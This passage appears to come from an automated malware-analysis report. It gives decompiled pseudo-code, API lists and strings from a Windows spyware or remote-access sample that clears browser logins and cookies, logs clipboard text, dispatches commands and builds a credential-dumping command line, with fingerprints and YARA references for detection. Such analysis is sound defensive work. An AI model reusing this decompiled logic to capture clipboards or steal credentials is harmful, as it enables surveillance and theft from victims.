				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                  0x004078be
                                  0x004078cd
                                  0x004078d4
                                  0x004078d6
                                  0x004078da
                                  0x004078de
                                  0x004078e2
                                  0x004078e6
                                  0x004078e8
                                  0x004078ec
                                  0x004078ee
                                  0x004078f3
                                  0x004078f3
                                  0x004078fa
                                  0x00407901
                                  0x00407901
                                  0x00407908
                                  0x0040790f
                                  0x0040790f
                                  0x00407916
                                  0x0040791d
                                  0x0040791d
                                  0x00407922
                                  0x00407929
                                  0x00407929
                                  0x0040792f
                                  0x0040794c
                                  0x0040794c
                                  0x00407952
                                  0x00000000
                                  0x00000000
                                  0x00407954
                                  0x0040797c
                                  0x00407982
                                  0x00407992
                                  0x004079a6
                                  0x004079ac
                                  0x004079bf
                                  0x004079cf
                                  0x004079db
                                  0x004079e9
                                  0x004079f5
                                  0x004079fa
                                  0x004079fd
                                  0x00407a09

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [INFO], xrefs: 004079A1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407B8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				char* _t29;
				void* _t38;
				intOrPtr _t49;
				void* _t50;
				void* _t53;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t49 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t53 = _t50 + 0x24;
				_t19 = _t49 - 0x42;
				if(_t19 == 0) {
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t21 = E00406DD9(_t20);
					__eflags = _t21;
					_pop(_t38);
					if(_t21 != 0) {
						_t24 = E00407033(_t21, "FunFunc");
						_push(_t38);
						 *0x41ba18 = _t24;
						 *0x41ba1c = 1;
						E00412855(_t38, _t53, 0x41bcf8);
						E004020C2(_a4, 0x6d, _t38);
					}
				} else {
					_t56 = _t19 == 1;
					if(_t19 == 1) {
						_t29 = E0040180C( &_v20, _t56, 0);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x41ba18(atoi(_t29));
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}














                                  0x00407b96
                                  0x00407b9c
                                  0x00407bae
                                  0x00407bbe
                                  0x00407bcd
                                  0x00407bd7
                                  0x00407bde
                                  0x00407be1
                                  0x00407be4
                                  0x00407c12
                                  0x00407c19
                                  0x00407c20
                                  0x00407c25
                                  0x00407c27
                                  0x00407c28
                                  0x00407c30
                                  0x00407c35
                                  0x00407c37
                                  0x00407c44
                                  0x00407c4b
                                  0x00407c57
                                  0x00407c57
                                  0x00407be6
                                  0x00407be6
                                  0x00407be7
                                  0x00407bee
                                  0x00407bf5
                                  0x00407c03
                                  0x00407c0a
                                  0x00407be7
                                  0x00407c5f
                                  0x00407c67
                                  0x00407c70
                                  0x00407c7a

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00407BAE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                  • atoi.MSVCRT ref: 00407BFC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                  • String ID: FunFunc
                                  • API String ID: 2980839617-81400306
                                  • Opcode ID: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                  • Opcode Fuzzy Hash: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                  0x00406c45
                                  0x00406c4c
                                  0x00406c4e
                                  0x00406c5b
                                  0x00406c66
                                  0x00406c6b
                                  0x00406c72
                                  0x00406c7c
                                  0x00406c81
                                  0x00406c8b
                                  0x00406c93
                                  0x00406c99
                                  0x00406ca2
                                  0x00406cac
                                  0x00406cc4
                                  0x00406cce
                                  0x00406cd8
                                  0x00406ce0
                                  0x00406ce0
                                  0x00406cac
                                  0x00406ce9
                                  0x00406cf3

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411A24, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                  • String ID: alarm.wav
                                  • API String ID: 3304909635-4094641389
                                  • Opcode ID: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                  • Opcode Fuzzy Hash: 275becf3e7b5aad21c3a1e6316b4335fa0b58386413a51555f92c954be46c816
                                  • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040AD91
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                    • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                    • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                    • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                    • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                    • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                    • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                  • String ID:
                                  • API String ID: 1795822965-0
                                  • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                  • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                  • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004124BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
